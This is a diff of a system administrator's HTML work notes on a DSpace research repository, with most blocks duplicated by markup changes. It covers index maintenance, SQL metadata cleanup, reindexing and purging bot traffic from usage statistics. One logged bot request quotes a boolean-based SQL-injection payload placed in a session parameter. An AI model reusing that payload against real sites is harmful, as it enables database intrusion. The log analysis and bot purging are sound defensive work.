<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-15&#39;</span>
</span></span></code></pre></div><ul>
<li>Call with Abdullah from CodeObia to discuss community and collection statistics reporting</li>
</ul>
<h2 id="2021-02-16">2021-02-16</h2>
@ -563,49 +563,49 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</li>
<li>They are definitely bots posing as users, as I see they have created six thousand DSpace sessions today:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat dspace.log.2021-02-16 | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=45.146.165.203&#39;</span> | sort | uniq | wc -l
4007
$ cat dspace.log.2021-02-16 | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=130.255.161.231&#39;</span> | sort | uniq | wc -l
2128
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat dspace.log.2021-02-16 | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=45.146.165.203&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>4007
</span></span><span style="display:flex;"><span>$ cat dspace.log.2021-02-16 | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=130.255.161.231&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>2128
</span></span></code></pre></div><ul>
<li>Ah, actually 45.146.165.203 is making requests like this:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">&#34;http://cgspace.cgiar.org:80/bitstream/handle/10568/238/Res_report_no3.pdf;jsessionid=7311DD88B30EEF9A8F526FF89378C2C5%&#39; AND 4313=CONCAT(CHAR(113)+CHAR(98)+CHAR(106)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (4313=4313) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)) AND &#39;XzQO%&#39;=&#39;XzQO&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>&#34;http://cgspace.cgiar.org:80/bitstream/handle/10568/238/Res_report_no3.pdf;jsessionid=7311DD88B30EEF9A8F526FF89378C2C5%&#39; AND 4313=CONCAT(CHAR(113)+CHAR(98)+CHAR(106)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (4313=4313) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)) AND &#39;XzQO%&#39;=&#39;XzQO&#34;
</span></span></code></pre></div><ul>
<li>I purged the hits from these two using my <code>check-spider-ip-hits.sh</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
Purging 4005 hits from 45.146.165.203 in statistics
Purging 3493 hits from 130.255.161.231 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 7498
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
</span></span><span style="display:flex;"><span>Purging 4005 hits from 45.146.165.203 in statistics
</span></span><span style="display:flex;"><span>Purging 3493 hits from 130.255.161.231 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 7498
</span></span></code></pre></div><ul>
<li>Ugh, I looked in Solr for the top IPs in 2021-01 and found a few more of these Russian IPs so I purged them too:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
Purging 27163 hits from 45.146.164.176 in statistics
Purging 19556 hits from 45.146.165.105 in statistics
Purging 15927 hits from 45.146.165.83 in statistics
Purging 8085 hits from 45.146.165.104 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 70731
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
</span></span><span style="display:flex;"><span>Purging 27163 hits from 45.146.164.176 in statistics
</span></span><span style="display:flex;"><span>Purging 19556 hits from 45.146.165.105 in statistics
</span></span><span style="display:flex;"><span>Purging 15927 hits from 45.146.165.83 in statistics
</span></span><span style="display:flex;"><span>Purging 8085 hits from 45.146.165.104 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 70731
</span></span></code></pre></div><ul>
<li>My god, and 64.39.99.15 is from Qualys, the domain scanning security people, who are making queries trying to see if we are vulnerable or something (wtf?)
<ul>
<li>Looking in Solr I see a few different IPs with DNS like <code>sn003.s02.iad01.qualys.com.</code> so I will purge their requests too:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
Purging 3 hits from 130.255.161.231 in statistics
Purging 16773 hits from 64.39.99.15 in statistics
Purging 6976 hits from 64.39.99.13 in statistics
Purging 13 hits from 64.39.99.63 in statistics
Purging 12 hits from 64.39.99.65 in statistics
Purging 12 hits from 64.39.99.94 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 23789
</code></pre></div><h2 id="2021-02-17">2021-02-17</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
</span></span><span style="display:flex;"><span>Purging 3 hits from 130.255.161.231 in statistics
</span></span><span style="display:flex;"><span>Purging 16773 hits from 64.39.99.15 in statistics
</span></span><span style="display:flex;"><span>Purging 6976 hits from 64.39.99.13 in statistics
</span></span><span style="display:flex;"><span>Purging 13 hits from 64.39.99.63 in statistics
</span></span><span style="display:flex;"><span>Purging 12 hits from 64.39.99.65 in statistics
</span></span><span style="display:flex;"><span>Purging 12 hits from 64.39.99.94 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 23789
</span></span></code></pre></div><h2 id="2021-02-17">2021-02-17</h2>
<ul>
<li>I tested Node.js 10 vs 12 on CGSpace (linode18) and DSpace Test (linode26) and the build times were surprising
<ul>
@ -627,11 +627,11 @@ Purging 12 hits from 64.39.99.94 in statistics
<li>Abenet asked me to add Tom Randolph&rsquo;s ORCID identifier to CGSpace</li>
<li>I also tagged all his 247 existing items on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-02-17-add-tom-orcid.csv
dc.contributor.author,cg.creator.id
&#34;Randolph, Thomas F.&#34;,&#34;Thomas Fitz Randolph: 0000-0003-1849-9877&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</code></pre></div><h2 id="2021-02-20">2021-02-20</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-02-17-add-tom-orcid.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.id
</span></span><span style="display:flex;"><span>&#34;Randolph, Thomas F.&#34;,&#34;Thomas Fitz Randolph: 0000-0003-1849-9877&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
</span></span></code></pre></div><h2 id="2021-02-20">2021-02-20</h2>
<ul>
<li>Test the CG Core v2 migration on DSpace Test (linode26) one last time</li>
</ul>
@ -640,17 +640,17 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace
<li>Start the CG Core v2 migration on CGSpace (linode18)</li>
<li>After deploying the latest <code>6_x-prod</code> branch and running <code>migrate-fields.sh</code> I started a full Discovery reindex:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 311m12.617s
user 217m3.102s
sys 2m37.363s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 311m12.617s
</span></span><span style="display:flex;"><span>user 217m3.102s
</span></span><span style="display:flex;"><span>sys 2m37.363s
</span></span></code></pre></div><ul>
<li>Then update OAI:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace oai import -c
$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace oai import -c
</span></span><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;</span>
</span></span></code></pre></div><ul>
<li>Ben Hack was asking if there is a REST API query that will give him all ILRI outputs for their new Sharepoint intranet
<ul>
<li>I told him he can try to use something like this if it&rsquo;s just something like the ILRI articles in journals collection:</li>
@ -668,16 +668,16 @@ $ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx1024m&#39;</span>
$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx1024m&#39;</span>
</span></span><span style="display:flex;"><span>$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
</span></span></code></pre></div><ul>
<li>The process took an hour or so!</li>
<li>I added colorized output to the csv-metadata-quality tool and tagged <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.4">version 0.4.4 on GitHub</a></li>
<li>I updated the fields in AReS Explorer and then removed the old temp index so I can start a fresh re-harvest of CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><h2 id="2021-02-22">2021-02-22</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><h2 id="2021-02-22">2021-02-22</h2>
<ul>
<li>Start looking at splitting the series name and number in <code>dcterms.isPartOf</code> now that we have migrated to CG Core v2
<ul>
@ -687,43 +687,43 @@ $ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;^(.+?);$&#39;,&#39;\1&#39;, &#39;g&#39;) WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ &#39;;$&#39;;
UPDATE 104
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;^(.+?);$&#39;,&#39;\1&#39;, &#39;g&#39;) WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ &#39;;$&#39;;
</span></span><span style="display:flex;"><span>UPDATE 104
</span></span></code></pre></div><ul>
<li>As for splitting the other values, I think I can export the <code>dspace_object_id</code> and <code>text_value</code> and then upload it as a CSV rather than writing a Python script to create the new metadata values</li>
</ul>
<h2 id="2021-02-22-1">2021-02-22</h2>
<ul>
<li>Check the results of the AReS harvesting from last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 101380,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 101380,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>Set the current items index to read only and make a backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-22
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-22
</span></span></code></pre></div><ul>
<li>Delete the current items index and clone the temp one to it:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span></code></pre></div><ul>
<li>Then delete the temp and backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
{&#34;acknowledged&#34;:true}%
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-22&#39;</span>
</code></pre></div><h2 id="2021-02-23">2021-02-23</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true}%
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-22&#39;</span>
</span></span></code></pre></div><h2 id="2021-02-23">2021-02-23</h2>
<ul>
<li>CodeObia sent a <a href="https://github.com/ilri/OpenRXV/pull/75">pull request for clickable countries on AReS</a>
<ul>
@ -732,22 +732,22 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</li>
<li>Remove semicolons from series names without numbers:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# BEGIN;
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;^(.+?);$&#39;,&#39;\1&#39;, &#39;g&#39;) WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ &#39;;$&#39;;
UPDATE 104
dspace=# COMMIT;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;^(.+?);$&#39;,&#39;\1&#39;, &#39;g&#39;) WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ &#39;;$&#39;;
</span></span><span style="display:flex;"><span>UPDATE 104
</span></span><span style="display:flex;"><span>dspace=# COMMIT;
</span></span></code></pre></div><ul>
<li>Set all <code>text_lang</code> values on CGSpace to <code>en_US</code> to make the series replacements easier (this didn&rsquo;t work, read below):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# BEGIN;
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE text_lang !=&#39;en_US&#39; AND dspace_object_id IN (SELECT uuid FROM item);
UPDATE 911
cgspace=# COMMIT;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE text_lang !=&#39;en_US&#39; AND dspace_object_id IN (SELECT uuid FROM item);
</span></span><span style="display:flex;"><span>UPDATE 911
</span></span><span style="display:flex;"><span>cgspace=# COMMIT;
</span></span></code></pre></div><ul>
<li>Then export all series with their IDs to CSV:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# \COPY (SELECT dspace_object_id, text_value as &#34;dcterms.isPartOf[en_US]&#34; FROM metadatavalue WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item)) TO /tmp/2021-02-23-series.csv WITH CSV HEADER;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# \COPY (SELECT dspace_object_id, text_value as &#34;dcterms.isPartOf[en_US]&#34; FROM metadatavalue WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item)) TO /tmp/2021-02-23-series.csv WITH CSV HEADER;
</span></span></code></pre></div><ul>
<li>In OpenRefine I trimmed and consolidated whitespace, then made some quick cleanups to normalize the fields based on a sanity check
<ul>
<li>For example many Spore items are like &ldquo;Spore, Spore 23&rdquo;</li>
@ -761,23 +761,23 @@ cgspace=# COMMIT;
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE metadata_value_id=5355845;
UPDATE 1
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE metadata_value_id=5355845;
</span></span><span style="display:flex;"><span>UPDATE 1
</span></span></code></pre></div><ul>
<li>This also seems to work, using the id for just that one item:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id=&#39;9840d19b-a6ae-4352-a087-6d74d2629322&#39;;
UPDATE 37
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id=&#39;9840d19b-a6ae-4352-a087-6d74d2629322&#39;;
</span></span><span style="display:flex;"><span>UPDATE 37
</span></span></code></pre></div><ul>
<li>This seems to work better for some reason:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspacetest=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item);
UPDATE 18659
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspacetest=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item);
</span></span><span style="display:flex;"><span>UPDATE 18659
</span></span></code></pre></div><ul>
<li>I split the CSV file in batches of 5,000 using xsv, then imported them one by one in CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace metadata-import -f /tmp/0.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-import -f /tmp/0.csv
</span></span></code></pre></div><ul>
<li>It took FOREVER to import each file&hellip; like several hours <em>each</em>. MY GOD DSpace 6 is slow.</li>
<li>Help Dominique Perera debug some issues with the WordPress DSpace importer plugin from Macaroni Bros
<ul>
@ -785,40 +785,40 @@ UPDATE 18659
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">104.198.97.97 - - [23/Feb/2021:11:41:17 +0100] &#34;GET /rest/communities?limit=1000 HTTP/1.1&#34; 200 188779 &#34;https://cgspace.cgiar.org/rest /communities?limit=1000&#34; &#34;RTB website BOT&#34;
104.198.97.97 - - [23/Feb/2021:11:41:18 +0100] &#34;GET /rest/communities//communities HTTP/1.1&#34; 404 714 &#34;https://cgspace.cgiar.org/rest/communities//communities&#34; &#34;RTB website BOT&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>104.198.97.97 - - [23/Feb/2021:11:41:17 +0100] &#34;GET /rest/communities?limit=1000 HTTP/1.1&#34; 200 188779 &#34;https://cgspace.cgiar.org/rest /communities?limit=1000&#34; &#34;RTB website BOT&#34;
</span></span><span style="display:flex;"><span>104.198.97.97 - - [23/Feb/2021:11:41:18 +0100] &#34;GET /rest/communities//communities HTTP/1.1&#34; 404 714 &#34;https://cgspace.cgiar.org/rest/communities//communities&#34; &#34;RTB website BOT&#34;
</span></span></code></pre></div><ul>
